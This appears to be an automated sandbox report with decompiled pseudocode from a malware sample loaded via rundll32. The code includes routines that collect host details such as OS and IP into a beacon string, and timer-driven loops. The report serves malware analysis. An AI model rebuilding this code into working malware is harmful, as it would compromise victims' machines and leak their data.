Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 25162564f0ef772eb57f50282b2b678e39561819cd6a07def4d18eec693cfae9
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: C0F037B690030CFFDB119FA5CC89C9FBBBDEB44354B104979F152E1191D6309E589B60

Uniqueness

Uniqueness Score: -1.00%

Function 04446F19, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E04446F19(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x444a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x444a018; // 0x632e214f
					asm("bswap eax");
					_t32 =  *0x444a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x444a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x444a00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0x444a2d4; // 0xefd5a8
					_t2 = _t35 + 0x444b622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d163, _t34, _t33, _t32, _t31,  *0x444a02c,  *0x444a004, _t110);
					_t38 = E04441D5C();
					_t39 =  *0x444a2d4; // 0xefd5a8
					_t3 = _t39 + 0x444b662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x444a2d4; // 0xefd5a8
						_t7 = _t92 + 0x444b66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E04444A8B(_t99);
					_t44 =  *0x444a2d4; // 0xefd5a8
					_t9 = _t44 + 0x444b38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x444a2d4; // 0xefd5a8
					_t11 = _t48 + 0x444b33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x444a32c; // 0x53495b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x444a2d4; // 0xefd5a8
						_t13 = _t88 + 0x444b685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x444a37c; // 0x5349630
					_a28 = E04445187(0x444a00a, _t105 + 4);
					_t55 =  *0x444a31c; // 0x53495e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x444a2d4; // 0xefd5a8
						_t16 = _t84 + 0x444b8e9; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x444a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x444a2d4; // 0xefd5a8
						_t18 = _t81 + 0x444b8e2; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x444a290, _t107, 0x800);
						if(_t98 != _t107) {
							E044448C9(GetTickCount());
							_t62 =  *0x444a37c; // 0x5349630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x444a37c; // 0x5349630
							__imp__(_t66 + 0x40);
							_t68 =  *0x444a37c; // 0x5349630
							_t69 = E044439E6(1, _t103, _t117,  *_t68); // executed
							_t115 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x44492ac);
								_push(_t115);
								_t108 = E04445217();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E04441B87(0xffffffffffffffff, _t98, _v12, _v8); // executed
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E0444470B();
									}
									HeapFree( *0x444a290, 0, _v24);
								}
								HeapFree( *0x444a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x444a290, _t107, _t98);
						}
						HeapFree( *0x444a290, _t107, _a20);
					}
					RtlFreeHeap( *0x444a290, _t107, _t117); // executed
				}
				return _v16;
			}

0x04446f19
0x04446f2d
0x04446f2f
0x04446f3d
0x04446f41
0x04446f49
0x04446f51
0x04446f51
0x04446f53
0x04446f5f
0x04446f6e
0x04446f73
0x04446f76
0x04446f7b
0x04446f7e
0x04446f83
0x04446f86
0x04446f92
0x04446f9f
0x04446fa1
0x04446fa7
0x04446fac
0x04446fb7
0x04446fb9
0x04446fbc
0x04446fc2
0x04446fc4
0x04446fcd
0x04446fd8
0x04446fda
0x04446fdd
0x04446fdd
0x04446fdf
0x04446fe6
0x04446feb
0x04446ff8
0x04446ffa
0x04446fff
0x0444700d
0x0444700f
0x04447014
0x04447019
0x0444701c
0x04447021
0x0444702c
0x0444702e
0x04447031
0x04447031
0x04447033
0x04447046
0x0444704a
0x0444704f
0x04447053
0x04447056
0x0444705b
0x04447066
0x04447068
0x0444706b
0x0444706b
0x0444706d
0x04447074
0x04447077
0x0444707c
0x04447086
0x04447088
0x0444708f
0x044470a7
0x044470ab
0x044470b7
0x044470bc
0x044470c5
0x044470d6
0x044470da
0x044470e3
0x044470e9
0x044470f1
0x044470f6
0x04447103
0x04447109
0x04447111
0x04447117
0x0444711d
0x04447121
0x04447125
0x0444712b
0x0444712f
0x04447136
0x0444713d
0x04447141
0x0444714c
0x04447153
0x04447157
0x04447160
0x04447160
0x04447171
0x04447171
0x04447180
0x04447186
0x04447186
0x04447190
0x04447190
0x044471a1
0x044471a1
0x044471af
0x044471af
0x044471bf

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 04446F37
GetTickCount.KERNEL32 ref: 04446F4B
wsprintfA.USER32 ref: 04446F9A
wsprintfA.USER32 ref: 04446FB7
wsprintfA.USER32 ref: 04446FD8
wsprintfA.USER32 ref: 04446FF6
wsprintfA.USER32 ref: 0444700B
wsprintfA.USER32 ref: 0444702C
wsprintfA.USER32 ref: 04447066
wsprintfA.USER32 ref: 04447086
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 044470A1
GetTickCount.KERNEL32 ref: 044470B1
RtlEnterCriticalSection.NTDLL(053495F0), ref: 044470C5
RtlLeaveCriticalSection.NTDLL(053495F0), ref: 044470E3

Part of subcall function 044439E6: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,044470F6,00000000,05349630), ref: 04443A11
Part of subcall function 044439E6: lstrlen.KERNEL32(00000000,?,00000000,044470F6,00000000,05349630), ref: 04443A19
Part of subcall function 044439E6: strcpy.NTDLL ref: 04443A30
Part of subcall function 044439E6: lstrcat.KERNEL32(00000000,00000000), ref: 04443A3B
Part of subcall function 044439E6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,044470F6,?,00000000,044470F6,00000000,05349630), ref: 04443A58

StrTrimA.SHLWAPI(00000000,044492AC,00000000,05349630), ref: 04447111

Part of subcall function 04445217: lstrlen.KERNEL32(0534887A,00000000,00000000,00000000,0444711D,00000000), ref: 04445227
Part of subcall function 04445217: lstrlen.KERNEL32(?), ref: 0444522F
Part of subcall function 04445217: lstrcpy.KERNEL32(00000000,0534887A), ref: 04445243
Part of subcall function 04445217: lstrcat.KERNEL32(00000000,?), ref: 0444524E

lstrcpy.KERNEL32(00000000,?), ref: 0444712F
lstrcat.KERNEL32(00000000,00000000), ref: 0444713D
lstrcat.KERNEL32(00000000,00000000), ref: 04447141
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04447171
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04447180
HeapFree.KERNEL32(00000000,00000000,00000000,05349630), ref: 04447190
HeapFree.KERNEL32(00000000,?), ref: 044471A1
RtlFreeHeap.NTDLL(00000000,00000000), ref: 044471AF

Strings

O!.c, xrefs: 04446F53

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID: O!.c
API String ID: 1837416118-67142254
Opcode ID: 551b6835e6719151126b629f3bfabc94119990ef8e19bd6081651c80505d0344
Instruction ID: 081b4004df77a5d782d11c08e0e3cc62140073ac9b4a0b30c39369dfe6674c27
Opcode Fuzzy Hash: 551b6835e6719151126b629f3bfabc94119990ef8e19bd6081651c80505d0344
Instruction Fuzzy Hash: B6716DBA640504AFFB21DF69EC88E5777ECFBC8701B050515F949E3211EA3AEC05AB61

Uniqueness

Uniqueness Score: -1.00%

Function 04447662, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E04447662(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				long _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x444a298);
					_v20 = 0;
					_v16 = 0;
					L04447DDC();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x444a2c4; // 0x2d8
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x444a2a4 = 5;
						} else {
							_t69 = E04445325(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x444a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E04442145( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E04441E1E(_t73, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x444a29c);
							goto L21;
						} else {
							__eflags =  *0x444a2a0; // 0x3
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E0444470B();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x444a2a0);
								L21:
								L04447DDC();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x444a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x04447662
0x04447674
0x04447677
0x04447683
0x0444768b
0x0444768e
0x044477f4
0x04447694
0x04447694
0x04447696
0x0444769b
0x0444769c
0x044476a2
0x044476a5
0x044476a8
0x044476b6
0x044476c1
0x044476c4
0x044476c6
0x044476d3
0x044476dd
0x044476e1
0x044476e4
0x044476e9
0x044476f4
0x044476f4
0x044476eb
0x044476eb
0x044476f2
0x00000000
0x00000000
0x044476f2
0x044476fe
0x00000000
0x04447701
0x04447705
0x04447710
0x04447710
0x04447717
0x0444771c
0x04447723
0x0444772c
0x04447732
0x04447735
0x0444773c
0x0444773f
0x00000000
0x00000000
0x04447741
0x04447744
0x04447747
0x0444774a
0x00000000
0x0444774c
0x04447756
0x0444775b
0x0444775b
0x00000000
0x04447789
0x04447789
0x0444778e
0x044477ad
0x044477af
0x044477b4
0x044477b5
0x00000000
0x04447790
0x04447790
0x04447796
0x00000000
0x04447798
0x04447798
0x0444779d
0x0444779f
0x044477a4
0x044477a5
0x044477bb
0x044477bb
0x044477c3
0x044477ce
0x044477d1
0x044477dc
0x044477de
0x044477e0
0x044477e3
0x00000000
0x044477e9
0x00000000
0x044477e9
0x044477e3
0x04447796
0x00000000
0x0444778e
0x0444775e
0x04447760
0x04447763
0x04447764
0x04447764
0x04447768
0x04447772
0x04447772
0x04447778
0x0444777b
0x0444777b
0x04447781
0x04447781
0x044477fe
0x00000000

APIs

memset.NTDLL ref: 04447677
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04447683
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 044476A8
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 044476C4
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 044476DD
HeapFree.KERNEL32(00000000,00000000), ref: 04447772
CloseHandle.KERNEL32(?), ref: 04447781
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 044477BB
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,044464F7), ref: 044477D1
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 044477DC

Part of subcall function 04445325: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05349318,00000000,?,74B5F710,00000000,74B5F730), ref: 04445374
Part of subcall function 04445325: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05349350,?,00000000,30314549,00000014,004F0053,0534930C), ref: 04445411
Part of subcall function 04445325: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044476F0), ref: 04445423

GetLastError.KERNEL32 ref: 044477EE

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 4ebfc8ad60af900afbdbc778d29579a3db410c4864700e8de203c36e78f6a134
Instruction ID: 04e3e95ed89e81708bb09012d1ed270688c12597b588ef64ad21401dda922e48
Opcode Fuzzy Hash: 4ebfc8ad60af900afbdbc778d29579a3db410c4864700e8de203c36e78f6a134
Instruction Fuzzy Hash: BB515AB5901228AEEF11DFA5DC849EFBFBDEF85364F204116E410B2280D775AA41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 70300E80, Relevance: 13.8, APIs: 9, Instructions: 326
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoA.KERNEL32(?), ref: 70300EC0
__nh_malloc_dbg.LIBCMTD ref: 70300F0B

Part of subcall function 702F1800: __calloc_dbg_impl.LIBCMTD ref: 702F1827

__nh_malloc_dbg.LIBCMTD ref: 70301037
GetFileType.KERNEL32(?), ref: 70301147

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: __nh_malloc_dbg$FileInfoStartupType__calloc_dbg_impl
String ID:
API String ID: 2478872478-0
Opcode ID: c95f2ae45876c7fba2f0eb7a7eaf2935d2c006bb2e13b0b708cb158bb50f7819
Instruction ID: 9c69b286d826cbdc1b64274dec647bfc30b0cbe28edbeb7bae86d0891a6e29f0
Opcode Fuzzy Hash: c95f2ae45876c7fba2f0eb7a7eaf2935d2c006bb2e13b0b708cb158bb50f7819
Instruction Fuzzy Hash: 0BE11974E05248CFDB25CFA4C890B9DBBBABF49314F24825DD865AB386D735A842CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04441000, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E04441000(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04447DD6();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x444a2d4; // 0xefd5a8
				_t5 = _t13 + 0x444b84d; // 0x5348df5
				_t6 = _t13 + 0x444b580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04447ABA();
				_t17 = CreateFileMappingW(0xffffffff, 0x444a2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x04441000
0x04441008
0x0444100c
0x04441012
0x04441017
0x0444101c
0x0444101f
0x04441022
0x04441027
0x04441028
0x0444102b
0x04441030
0x04441037
0x04441041
0x04441043
0x04441044
0x04441047
0x04441063
0x04441069
0x0444106d
0x044410bb
0x0444106f
0x0444107c
0x0444108c
0x04441094
0x044410a6
0x044410aa
0x00000000
0x00000000
0x04441096
0x04441099
0x0444109e
0x044410a0
0x044410a0
0x0444107e
0x04441080
0x044410ac
0x044410ad
0x044410ad
0x0444107c
0x044410c2

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,04446373,?,00000001,?), ref: 0444100C
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04441022
_snwprintf.NTDLL ref: 04441047
CreateFileMappingW.KERNELBASE(000000FF,0444A2F8,00000004,00000000,00001000,?), ref: 04441063
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04446373,?), ref: 04441075
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 0444108C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04446373), ref: 044410AD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04446373,?), ref: 044410B5

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 64fae9dc3e31fbb49b74b8ef324427325dde73fb78c62106ab320bc6f6e8ead3
Instruction ID: 29a77f1505bc10b6c0ea677564a3afd3b6c331f7c8391bf644854728a0186d2a
Opcode Fuzzy Hash: 64fae9dc3e31fbb49b74b8ef324427325dde73fb78c62106ab320bc6f6e8ead3
Instruction Fuzzy Hash: 1321D5B6640214FBFB219B64DC09F9EB7B9EBC4750F244126FA05E72C0EB70E9419B60

Uniqueness

Uniqueness Score: -1.00%

Function 044462DD, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E044462DD(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E044462AE();
				if(_t27 != 0) {
					_t77 =  *0x444a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x444a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x444a148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E0444120F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x444a2d4; // 0xefd5a8
					_push(0x444a2fc);
					_push(1);
					_t7 = _t32 + 0x444b5bc; // 0x4d283a53
					 *0x444a2f8 = 0xc;
					 *0x444a300 = 0;
					L04442029();
					_t36 = E04441000(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E04444BDF(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E04441EF5(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x444a2d4; // 0xefd5a8
								_t18 = _t64 + 0x444b86f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x444a32c = _t87;
						}
						_t38 = E04442808();
						 *0x444a2c8 =  *0x444a2c8 ^ 0xe8fa7dd7;
						 *0x444a31c = _t38;
						_t39 = E04441EF5(0x60);
						__eflags = _t39;
						 *0x444a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x444a37c; // 0x5349630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x444a37c; // 0x5349630
							 *_t56 = 0x444b85e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x444a290, _t84, 0x52);
							__eflags = _t42;
							 *0x444a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x444a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x444a2d4; // 0xefd5a8
								_t19 = _t76 + 0x444b212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x44492a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E04444BDF( ~_v8 &  *0x444a2c8, 0x444a00c); // executed
								_t84 = E0444175B(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E044428AE();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E04447662(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E0444442E(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x444a14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E044438B3(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x044462dd
0x044462e8
0x044462eb
0x044462ee
0x044462f1
0x044462f8
0x044462fa
0x04446306
0x04446308
0x04446308
0x04446311
0x04446319
0x0444631c
0x04446336
0x0444633b
0x0444633c
0x0444633e
0x04446343
0x04446348
0x0444634a
0x04446351
0x0444635b
0x04446361
0x0444636e
0x04446375
0x0444637a
0x0444637a
0x04446383
0x044463ac
0x044463af
0x044463bc
0x044463c3
0x044463cf
0x044463d1
0x044463d3
0x044463d8
0x044463de
0x044463e4
0x044463ea
0x044463ed
0x044463f2
0x044463fa
0x044463fc
0x044463fc
0x044463ff
0x044463ff
0x04446405
0x0444640a
0x04446412
0x04446417
0x0444641c
0x0444641e
0x04446423
0x04446452
0x04446425
0x0444642a
0x0444642f
0x04446434
0x0444643b
0x04446441
0x04446446
0x0444644c
0x0444644c
0x04446453
0x04446455
0x04446464
0x0444646a
0x0444646c
0x04446471
0x0444649d
0x04446473
0x04446473
0x04446479
0x04446486
0x0444648c
0x0444648c
0x04446494
0x04446496
0x0444649e
0x044464a0
0x044464a7
0x044464b4
0x044464be
0x044464c0
0x044464c2
0x00000000
0x00000000
0x044464c4
0x044464c9
0x044464cb
0x044464d2
0x044464d6
0x044464d9
0x044464ee
0x044464f2
0x044464f7
0x00000000
0x044464f7
0x044464db
0x044464dd
0x00000000
0x00000000
0x044464df
0x044464e8
0x044464ea
0x044464ec
0x00000000
0x00000000
0x00000000
0x044464ec
0x044464cf
0x044464cf
0x044464a0
0x04446385
0x04446385
0x0444638a
0x044464f9
0x044464fd
0x04446505
0x04446505
0x00000000
0x044464fd
0x04446390
0x04446393
0x04446393
0x04446395
0x04446398
0x044463a0
0x044463a7
0x00000000
0x0444650d
0x0444650d
0x04446510
0x04446515
0x04446515

APIs

Part of subcall function 044462AE: GetModuleHandleA.KERNEL32(4C44544E,00000000,044462F6,00000000,00000000,00000000,?,?,?,?,?,04442582,?,00000001), ref: 044462BD

